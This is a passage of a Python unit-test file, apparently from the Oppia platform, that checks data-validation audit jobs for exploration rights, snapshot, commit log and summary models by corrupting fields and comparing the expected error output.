self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExplorationRightsModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the job was '
'run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field exploration_ids having '
'value 0, expect model ExplorationModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_cloned_from_exploration_model_failure(self):
self.model_instance_0.cloned_from = 'invalid'
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for '
'cloned_from_exploration_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field cloned_from_exploration_ids '
'having value invalid, expect model ExplorationModel with id '
'invalid but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_exploration(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'ExplorationRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model ExplorationRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
if exp.id != '0':
exp_services.save_new_exploration(self.owner_id, exp)
else:
exp_services.save_new_exploration(self.user_id, exp)
self.model_instance_0 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ExplorationRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_rights_ids having value 0, expect model '
'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration rights model '
'version check of ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: ExplorationRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_exploration_status',
'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
}, {
'cmd': 'release_ownership',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_exploration_status check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'old_status\': u\'public\', '
'u\'cmd\': u\'change_exploration_status\'} '
'failed with error: The following required '
'attributes are missing: new_status"]]'
), (
u'[u\'failed validation check for commit cmd '
'release_ownership check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'release_ownership\', '
'u\'invalid_attribute\': u\'invalid\'} '
'failed with error: The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = (
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_rights_ids having value 0, expect model '
'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration rights model '
'version check of ExplorationRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: ExplorationRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated ExplorationRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.rights_model_instance = (
exp_models.ExplorationCommitLogEntryModel(
id='rights-1-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, exploration_id='1',
commit_type='edit', commit_message='', commit_cmds=[],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_community_owned=False,
post_commit_is_private=False))
self.rights_model_instance.put()
self.model_instance_0 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-0-1'))
self.model_instance_1 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-1-1'))
self.model_instance_2 = (
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 5]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
self.rights_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 '
'but it doesn\'t exist", u"Entity id exploration-0-2: based '
'on field exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationCommitLogEntryModel\', '
'[u"Entity id rights-1-1: based on field '
'exploration_rights_ids having value 1, expect model '
'ExplorationRightsModel with id 1 but it doesn\'t exist"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.exploration_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Exploration model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
exp_models.ExplorationCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.exploration_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'ExplorationCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'ExplorationCommitLogEntryModel\', '
'[u\'Entity id exploration-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of ExplorationCommitLogEntryModel\', '
'[u\'Entity id exploration-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'public'
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'public but post_commit_is_private is True\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = 'private'
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of ExplorationCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'private but post_commit_is_private is False\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_state'
}, {
'cmd': 'delete_state',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_state check of '
'ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'delete_state\', '
'u\'invalid_attribute\': u\'invalid\'} '
'failed with error: The following required attributes '
'are missing: state_name, '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_state check of '
'ExplorationCommitLogEntryModel\', '
'[u"Entity id exploration-0-1: Commit command domain '
'validation for command: {u\'cmd\': u\'add_state\'} '
'failed with error: The following required attributes '
'are missing: state_name"]]'
), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
class ExpSummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExpSummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
contributor_email = 'user@contributor.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.signup(contributor_email, 'contributor')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
self.contributor_id = self.get_user_id_from_email(contributor_email)
language_codes = ['ar', 'en', 'en']
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for exp in explorations:
exp.tags = ['math', 'art']
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.assign_role_for_exploration(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
exp_services.update_exploration(
self.contributor_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
rights_manager.assign_role_for_exploration(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
rating_services.assign_rating_to_exploration(self.user_id, '0', 3)
rating_services.assign_rating_to_exploration(self.viewer_id, '0', 4)
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_1 = exp_models.ExpSummaryModel.get_by_id('1')
self.model_instance_2 = exp_models.ExpSummaryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExpSummaryModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_exploration(self.owner, '0')
exp_services.update_exploration(
self.owner_id, '1', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExpSummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExpSummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
exp_models.ExplorationModel.get_by_id('1').delete(
self.owner_id, '')
exp_models.ExplorationModel.get_by_id('2').delete(
self.owner_id, '')
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.put()
rights_model = exp_models.ExplorationRightsModel.get_by_id('0')
rights_model.first_published_msec = (
self.model_instance_0.first_published_msec)
rights_model.commit(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExpSummaryModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the '
'job was run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field exploration_ids having '
'value 0, expect model ExplorationModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_exploration(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_contributor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
expected_output = [
(
u'[u\'failed validation check for contributor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field contributor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.contributor_id, self.contributor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_model_last_updated(self):
last_human_update_time = (
self.model_instance_0.exploration_model_last_updated)
self.model_instance_0.exploration_model_last_updated = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for exploration model last '
'updated check of ExpSummaryModel\', '
'[u\'Entity id %s: The exploration_model_last_updated '
'field: %s does not match the last time a commit was '
'made by a human contributor: %s\']]'
) % (
self.model_instance_0.id,
self.model_instance_0.exploration_model_last_updated,
last_human_update_time),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_schema(self):
self.model_instance_0.ratings = {'10': 4, '5': 15}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'ExpSummaryModel\', '
'[u\'Entity id 0: Entity fails domain validation with '
'the error Expected ratings to have keys: 1, 2, 3, 4, 5, '
'received 10, 5\']]'
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of ExpSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] '
'do not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]') % (
sorted_contributor_ids[0], sorted_contributor_ids[1]
),
u'[u\'fully-validated ExpSummaryModel\', 2]']
